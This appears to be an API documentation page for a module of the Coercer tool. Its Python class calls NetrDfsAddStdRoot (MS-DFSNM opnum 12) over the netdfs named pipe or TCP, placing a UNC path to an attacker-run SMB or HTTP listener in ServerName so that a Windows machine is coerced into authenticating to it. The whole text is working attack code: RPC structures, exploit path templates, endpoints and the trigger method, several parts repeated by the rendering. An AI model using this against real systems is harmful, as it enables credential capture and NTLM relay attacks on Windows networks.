coercer.methods.MS_DFSNM.NetrDfsAddStdRoot
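#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : NetrDfsAddStdRoot.py
# Author             : Podalirius (@podalirius_)
# Date created       : 14 Sep 2022

from coercer.core.utils import gen_random_name
from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _NetrDfsAddStdRoot(NDRCALL):
    """
    Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol (opnum 12).

    The four fields are filled in by ``NetrDfsAddStdRoot.trigger``; every
    string field is a NUL-terminated WSTR.
    """
    opnum = 12
    structure = (
        ('ServerName', WSTR),  # Type: WCHAR *
        ('RootShare', WSTR),   # Type: WCHAR *
        ('Comment', WSTR),     # Type: WCHAR *
        ('ApiFlags', DWORD),   # Type: DWORD
    )


class _NetrDfsAddStdRootResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol.

    Left empty on purpose: ``NetrDfsAddStdRoot.trigger`` never inspects the
    reply, it only checks whether the request raised.
    """
    structure = ()


class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
    - [@filip_dragovic](https://twitter.com/filip_dragovic)

    Only the ``ServerName`` argument carries the listener path (see
    ``function["vulnerable_arguments"]``); ``RootShare`` and ``Comment`` are
    random names and ``ApiFlags`` is always 0.
    """

    # Path templates; the placeholders are presumably expanded by the
    # framework into ``self.path`` before trigger() runs (not done here).
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints of the MS-DFSNM interface: the \PIPE\netdfs named pipe and
    # the same interface UUID over TCP. For monitoring purposes, calls to
    # opnum 12 on this interface UUID are the thing to watch for.
    # NOTE(review): the key is spelled "ncan_np" rather than the canonical
    # "ncacn_np"; it matches what the rest of the framework looks up, so it
    # is kept as-is — confirm before "fixing" it.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    function = {
        "name": "NetrDfsAddStdRoot",
        "opnum": 12,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsAddStdRoot request on an already-bound DCERPC session.

        :param dcerpc_session: bound impacket DCERPC session, or None when
            connect() has not been called yet.
        :param target: unused by this method; presumably part of the shared
            trigger() signature — TODO confirm against the base class.
        :return: "" when the request was sent without raising, the caught
            exception object when it raised, or None when there is no session.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsAddStdRoot()
            # ServerName is the only field that carries the listener path;
            # the other two strings just have to be valid NUL-terminated WSTRs.
            request['ServerName'] = self.path
            request['RootShare'] = gen_random_name() + '\x00'
            request['Comment'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The reply is discarded: "success" here means the call did not raise.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors (e.g. a DCERPCSessionError from the server) are returned
            # rather than raised so the caller can report them per path.
            return err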
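class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
    - [@filip_dragovic](https://twitter.com/filip_dragovic)

    Only the ``ServerName`` argument carries the listener path (see
    ``function["vulnerable_arguments"]``); ``RootShare`` and ``Comment`` are
    random names and ``ApiFlags`` is always 0.
    """

    # Path templates; the placeholders are presumably expanded by the
    # framework into ``self.path`` before trigger() runs (not done here).
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Endpoints of the MS-DFSNM interface: the \PIPE\netdfs named pipe and
    # the same interface UUID over TCP. For monitoring purposes, calls to
    # opnum 12 on this interface UUID are the thing to watch for.
    # NOTE(review): the key is spelled "ncan_np" rather than the canonical
    # "ncacn_np"; it matches what the rest of the framework looks up, so it
    # is kept as-is — confirm before "fixing" it.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    function = {
        "name": "NetrDfsAddStdRoot",
        "opnum": 12,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsAddStdRoot request on an already-bound DCERPC session.

        :param dcerpc_session: bound impacket DCERPC session, or None when
            connect() has not been called yet.
        :param target: unused by this method; presumably part of the shared
            trigger() signature — TODO confirm against the base class.
        :return: "" when the request was sent without raising, the caught
            exception object when it raised, or None when there is no session.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsAddStdRoot()
            # ServerName is the only field that carries the listener path;
            # the other two strings just have to be valid NUL-terminated WSTRs.
            request['ServerName'] = self.path
            request['RootShare'] = gen_random_name() + '\x00'
            request['Comment'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The reply is discarded: "success" here means the call did not raise.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors (e.g. a DCERPCSessionError from the server) are returned
            # rather than raised so the caller can report them per path.
            return err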
Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
Method found by: [@filip_dragovic](https://twitter.com/filip_dragovic)
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol =
{'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
def
trigger(self, dcerpc_session, target):
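def trigger(self, dcerpc_session, target):
    """
    Send one NetrDfsAddStdRoot request on an already-bound DCERPC session.

    :param dcerpc_session: bound impacket DCERPC session, or None when
        connect() has not been called yet.
    :param target: unused by this method; presumably part of the shared
        trigger() signature — TODO confirm against the base class.
    :return: "" when the request was sent without raising, the caught
        exception object when it raised, or None when there is no session.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _NetrDfsAddStdRoot()
        # ServerName is the only field that carries the listener path;
        # the other two strings just have to be valid NUL-terminated WSTRs.
        request['ServerName'] = self.path
        request['RootShare'] = gen_random_name() + '\x00'
        request['Comment'] = gen_random_name() + '\x00'
        request['ApiFlags'] = 0
        # The reply is discarded: "success" here means the call did not raise.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Errors (e.g. a DCERPCSessionError from the server) are returned
        # rather than raised so the caller can report them per path.
        return err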